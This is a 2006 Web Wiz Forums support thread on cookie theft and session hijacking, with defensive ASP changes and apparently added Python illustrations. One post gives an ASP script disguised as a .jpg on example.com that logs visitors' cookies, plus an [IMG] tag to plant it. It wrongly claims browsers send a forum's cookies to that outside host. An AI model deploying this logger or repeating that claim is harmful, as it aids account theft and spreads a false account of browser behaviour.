
Dear Web Wiz Family, big secure problem.

Printed From: Web Wiz Forums
Category: Web Wiz Web App Support Forums
Forum Name: Web Wiz Forums
Forum Description: Support forum for Web Wiz Forums application.
URL: https://forums.webwiz.net/forum_posts.asp?TID=18605
Printed Date: 28 March 2026 at 2:20pm
Software Version: Web Wiz Forums 12.08 - https://www.webwizforums.com


Topic: Dear Web Wiz Family, big secure problem.
Posted By: emr550m
Subject: Dear Web Wiz Family, big secure problem.
Date Posted: 05 March 2006 at 12:42am
First of all, I am very thankful to you for creating a wonderful forum like this and making it open source. I am using Web Wiz version 7.9 and don't know the new ones.
I have combined my site with Web Wiz forum and made a good portal. But these days some people (they call them hackers, I call them dummy persons :) are making me sad. I am searching about the edit hack. Any user can edit any message. How can this happen? I'm searching for this right now.

While I'm searching this I found lots of ugly things that should not be. Please, all webmasters, read this carefully;

Web Wiz Forums (7.9) works on cookies. If someone can steal your cookie, he/she can enter the forum as you very easily. With a cookie editor this can be done very easily.

I have solved this with a simple code change. Just modify the common.asp where the UID cookie is stored. Store the data in the session object.

After modifying the forum I saw this is not the only thing. I have found a worse thing, that is the ugliest thing. IIS web server has a big huge problem.

As you know, when you connect to an IIS web server it gives you a unique session ID. With this ID you interact with the server. Browsers store this ID as a cookie and it can also be stolen.

Someone who has your session ID can connect to the web server as you. So when you are online as admin the dummy guy can connect to the server as you and blow up your forum.

Microsoft also knows this issue and doesn't do anything. So we must find our own solution.

I have defined a general variable in session data, that is session("securecode"); I set this data equal to session ID + client's IP;

In every common.asp I look up the client's IP and session. If it's not equal to session("securecode") that means someone is connected to the server as you...

You can freely write to me about these two articles. My contact email is: info@genc-tanitim.com. You can discuss on MSN also: emr550maranello@hotmail.com.

Now my problem is about the editing hack. I see that some posts are edited by other users that don't have permission. How can this happen? What code should I modify in edit post .asp?

Very glad to meet you.
Emrah Öz
 



Replies:
Posted By: MadDog
Date Posted: 05 March 2006 at 1:30am
There is not a problem if you update to the latest version!

There are no cookie hacks to steal people's accounts.


-------------
http://www.iportalx.net


Posted By: emr550m
Date Posted: 05 March 2006 at 1:53am
Sir, that's the problem. I have many modifications on the ASP pages. So I can't directly put in the new file. I just need to know which code part will solve this edit hack problem.


Posted By: dpyers
Date Posted: 05 March 2006 at 5:45am
Cookie hacks are only a concern if you're using a shared computer - such as in an internet cafe. Not selecting "remember me" and logging out when done resolves that issue.

Session hijacking is pretty much a thing of the past unless you have a crooked host.


-------------

Lead me not into temptation... I know the short cut, follow me.


Posted By: emr550m
Date Posted: 05 March 2006 at 11:57am

Sir, cookie stealing can be done from everywhere. Just a single image. Hackers execute images as PHP or ASP files. They just put the image on their server, and use .

Internet browsers are very dumb things; while one is opening this forum and tries to open the image, it sends the current cookies to the image also. So it's not an image, it will take our cookie. Session hijacking is done the same way.

Default Microsoft IIS doesn't block session hijackers. I'm thinking about writing an ISAPI filter for that.



Posted By: MadDog
Date Posted: 05 March 2006 at 7:46pm
You can only read cookies from the domain you are on. Since the php/asp file is on a different server it can not read a cookie from the server the image is being called on.

You can not steal cookies using remote asp/php image files.


-------------
http://www.iportalx.net


Posted By: emr550m
Date Posted: 05 March 2006 at 8:14pm
Are you sure about that? I'm just thinking like that, but you're wrong. This is just a browser fault. Simple cookie stealing method (this subject is not hacking; I tell this to warn you to secure yourself).

First of all you need to set the ".jpg" extension to be executed by asp.dll. (This will execute jpg files as ASP.)

You create a file that has this code and save it on the server. Example name: s.jpg
The file's web address is like "http://www.example.com/s.jpg"
Sample code:

<%
dim fs, f,x
set fs=Server.CreateObject("Scripting.FileSystemObject")
set x=fs.GetFile(Server.MapPath("ekledik.txt"))

set f=x.OpenAsTextStream(8)
f.WriteLine(request.ServerVariables("HTTP_COOKIE"))
f.Close
set f=nothing
set fs=nothing

%>

You can also do anything in this. Users see this as just a jpg file. And then you add this code to the forum whose users' cookies you want to steal. (Simply use [ IMG ] http://www.example.com/s.jpg[/ IMG])

After that the most ugly thing is:
both Mozilla Firefox and Internet Explorer send the same cookie to the server to fetch this image when you are browsing the forum.

You can freely test this. I will test and see that that's right. The stealer can connect to the forum as you with just a cookie editor. He copies the stolen one to his cookie. Then blooooom!


I'm using version 7.9 of Web Wiz. This version is open to this attack. And I modified the cookie into session objects.




Posted By: MadDog
Date Posted: 05 March 2006 at 10:09pm
I am telling you it is not possible to use ASP or PHP code to get the cookies from another domain.

If you use "http://www.example.com/s.jpg" on the domain "http://www.webwiz.net" you can not read the cookies from Web Wiz. It will try to read the cookies from example.com

I even coded a test file before I made my first reply.

Edit: NEVERMIND! You are right. As soon as I made the custom extension and tested an ASP coded file it did read the cookie! That's not good! But keep in mind I tested this locally, not on WWF, so I'm not sure if it works 100%.

2nd Edit: I believe I was only getting the cookie from my local system and not WWF. I can not recreate this error after clearing my cookies from localhost. I do not believe this is a problem but I will be doing some more tests to make sure.


-------------
http://www.iportalx.net


Posted By: Gullanian
Date Posted: 05 March 2006 at 11:57pm
Wow!  This is a pretty big security problem, I will test it myself later.


Posted By: emr550m
Date Posted: 06 March 2006 at 12:45am
I have some modifications to solve this problem. I can help too. But this is not your or Web Wiz Forums' fault. This is the browser developers' and Microsoft IIS's problem. I don't know if Apache servers are open to session hijacking, but I think they will be.

I'll try to build an ISAPI filter to find out session hijackers. The cookie problem cannot be solved until a secure browser is developed. I'll use session data in my forum;

I'll modify the code in common.asp below

'Read in users ID number from the cookie
strLoggedInUserCode = Trim(Mid(Request.Cookies(strCookieName)("UID"), 1, 44))


I'll change it to something like this;


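Dim tmp_secure
'Expected binding: this session's ID plus the client's IP address
tmp_secure = Session.SessionID & Request.ServerVariables("REMOTE_ADDR")
securesession = Session("securesession")
If tmp_secure = securesession Then
    'Binding matches the value stored at login, so use the stored user code
    strLoggedInUserCode = Session("UID")
Else
    'No login or a mismatch: treat the request as a guest
    strLoggedInUserCode = ""
End If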


and in log_in_ser.asp;

        
Response.Cookies(strCookieName)("UID") = strUserCode

change this to;

Session("UID") = strUserCode
Session("securesession") = Session.SessionID & Request.ServerVariables("REMOTE_ADDR")
           

This will convert the whole forum to run without the cookie. It will run on session data. Don't forget to change log_off_user.asp or you cannot log off until you close the browser window.


Make the same change to admin/common.asp also.


 


Posted By: WebWiz-Bruce
Date Posted: 06 March 2006 at 11:36am
Sorry I have not seen this topic earlier, but it was posted in the wrong forum.

I am aware of all these issues and Web Wiz Forums does have security in place to prevent or limit the effects as much as possible.

If you select the auto login feature then an auto login cookie is set on your machine, which can cause issues if a hacker gets hold of this cookie.

To prevent and limit this problem as much as possible a number of things are in place.

Things to prevent this issue in 7.97 include:-
  • Session variables are used for the admin section and the admin is forced to re-login to gain access to the admin section.
  • Auto login/tracking cookie is updated in many parts, so the auto-login code is changed often
  • Session cookies are used if auto-login is not selected
  • Access users are informed to rename and protect their Access database so login data is not compromised
  • Security filters are used to filter unsafe user input to try and prevent cookie data being stolen
  • Passwords are 160-bit one way encrypted
Version 8 builds on this and adds more protection:-
  • Version 8 beta 2 onwards uses its own proprietary session tracking system, with additional IP checking for extra protection (much like emr550m mentions)
  • New proprietary session system times out after 20 minutes of inactivity, meaning if the hacker does get hold of your session ID they have less than 20 minutes to get past the additional session ID security and use the session ID
  • Session data held in application array for extra security (unless load balanced or web gardens are used in which case it's stored, slightly less securely, in the database)
  • Auto-login cookie is still used as people demand this even though there is a small risk of the cookie being hijacked (it is recommended not to use auto-login)
  • The admin section uses a second more secure login system that auto-login can not be used on and the admin must re-login to gain access to the admin section
  • Security filters have been updated to filter more unsafe content to prevent cookie hijacking
  • The auto-login cookie is updated more often
At the end of the day the biggest issue here is that HTTP is a stateless protocol, meaning that the connection to the web server is not maintained and is dropped as soon as the page loads in the browser window.

This means the only way to track and identify users is to place some sort of identity seed on the user's machine, in either the form of a cookie or a session ID.

Until the system of how HTTP works is changed or a new protocol can be used for viewing web pages there will always be a risk that the identity seed placed on the user's machine can be hijacked.

These issues should be known to all web masters, and measures put in place to limit this type of thing as much as possible.

Many months of on-going research, testing, and developing new and improved ways of limiting these inherent issues goes into Web Wiz Forums to make sure it is the most secure forum software around.
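
The session handling discussed in the posts above (a server-side session bound to the client IP that expires after 20 minutes of inactivity), as an added example in Python. It is not Web Wiz Forums code or emr550m's modification; the class, its method names and the sample addresses are assumptions made for illustration.

```python
import secrets
import time

IDLE_TIMEOUT = 20 * 60  # seconds: the 20-minute inactivity window from the post


class SessionStore:
    """Server-side session table (hypothetical design, constructed for this example)."""

    def __init__(self, clock=time.time):
        self._sessions = {}   # session ID -> {"uid", "ip", "last_seen"}
        self._clock = clock   # injectable so the timeout can be exercised offline
        self.rejected = []    # (reason, remote_addr) pairs, useful for alerting

    def login(self, user_code, remote_addr):
        # Unguessable ID; the user code itself never goes into the cookie.
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"uid": user_code, "ip": remote_addr,
                               "last_seen": self._clock()}
        return sid

    def resolve(self, sid, remote_addr):
        """Return the user code for a valid request, or "" to treat it as a guest."""
        entry = self._sessions.get(sid)
        if entry is None:
            self.rejected.append(("unknown-session", remote_addr))
            return ""
        now = self._clock()
        if now - entry["last_seen"] > IDLE_TIMEOUT:
            del self._sessions[sid]          # expired: a stolen ID is now useless
            self.rejected.append(("idle-timeout", remote_addr))
            return ""
        if entry["ip"] != remote_addr:
            # Same ID from another address: the replay case the thread worries about.
            self.rejected.append(("ip-mismatch", remote_addr))
            return ""
        entry["last_seen"] = now
        return entry["uid"]

    def logout(self, sid):
        self._sessions.pop(sid, None)


if __name__ == "__main__":
    store = SessionStore()
    sid = store.login("constructed-user-code", "203.0.113.10")
    print(store.resolve(sid, "203.0.113.10"))        # owner's address
    print(repr(store.resolve(sid, "198.51.100.7")))  # replay from elsewhere
    print(store.rejected)
```

Binding to the IP does not separate two clients that share one NAT or proxy address, and a user whose address changes mid-session is treated as a guest until they log in again.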


Posted By: emr550m
Date Posted: 06 March 2006 at 12:55pm
Yes, stateless protocols are always big trouble. But Microsoft can do something about that.

If it checks the connection IP and port of the visitors, nobody can steal the sessions. I'm working on ISAPI filters right now. I'll try to monitor the connections and try to catch the stealer. Theoretically this can be done. I'll write it here if I can get it done.


Posted By: Quinox
Date Posted: 16 March 2006 at 7:27am

You may not be able to steal cookies that way, but you sure can steal the session ID stored in the URL of clients with cookies disabled that way. By using a PHP or ASP to process an image and send it to the client, you can capture the HTTP_REFERER (which will have the query string in it) as well as REMOTE_USER for the IP.

So it looks to me that it's safer to enable cookies on the forum than to block them.
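
What the remote image host receives in the two cases argued over in this thread (a session cookie versus a session ID in the URL), modelled as an added example in Python that is not code from any poster. The forum host name, the SID parameter name and the cookie value are constructed; the domain test is a simplified form of RFC 6265 section 5.1.3, and the policy names are Referrer-Policy values.

```python
from urllib.parse import urlsplit


def domain_match(host, cookie_domain):
    """Simplified RFC 6265 5.1.3: host is the cookie domain or a subdomain of it."""
    host = host.lower()
    cookie_domain = cookie_domain.lower().lstrip(".")
    return host == cookie_domain or host.endswith("." + cookie_domain)


def cross_site_image_request(page_url, image_url, cookie_jar,
                             referrer_policy="unsafe-url"):
    """Return what the image host sees when page_url embeds image_url.

    cookie_jar is a list of (domain, name, value) tuples held by the browser.
    """
    image_host = urlsplit(image_url).hostname
    # Only cookies whose domain matches the *image* host are attached.
    cookies = {name: value for domain, name, value in cookie_jar
               if domain_match(image_host, domain)}
    page = urlsplit(page_url)
    if referrer_policy == "no-referrer":
        referer = None
    elif referrer_policy == "origin":
        referer = f"{page.scheme}://{page.netloc}/"
    else:
        # "unsafe-url": full page URL including the query string, minus fragment.
        referer = page_url.split("#")[0]
    return {"cookies": cookies, "referer": referer}


# Constructed sample data: the forum lives on forum.example.org.
JAR = [("forum.example.org", "UID", "constructed-login-token")]
IMAGE = "http://www.example.com/s.jpg"
COOKIE_MODE_PAGE = "http://forum.example.org/forum_posts.asp?TID=1"
URL_MODE_PAGE = "http://forum.example.org/forum_posts.asp?TID=1&SID=constructed-session-id"

if __name__ == "__main__":
    print(cross_site_image_request(COOKIE_MODE_PAGE, IMAGE, JAR))
    print(cross_site_image_request(URL_MODE_PAGE, IMAGE, JAR))
    print(cross_site_image_request(URL_MODE_PAGE, IMAGE, JAR, "origin"))
```

With the session in a cookie the image host gets neither the cookie nor the ID; with the session in the URL the ID travels in the Referer unless the forum sends a restrictive Referrer-Policy.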


Posted By: WebWiz-Bruce
Date Posted: 16 March 2006 at 11:51am
It will be safer to use cookies, and by default Web Wiz Forums will use cookies to store the session ID.

Having the session appended to the URL will only happen on an individual user basis if cookies are detected as not working.

As most people have cookies enabled the session ID will always be stored in a cookie, but there are always people who, for whatever reason, can't get cookies to work, in which case they will have to use the slightly less secure method of appending the session ID to the URL.

I personally would rather just go down the more secure route of using only cookies, but the cookie issue some users get is such a pain for forum admins that some option for those that can't use cookies needs to be incorporated into the software.


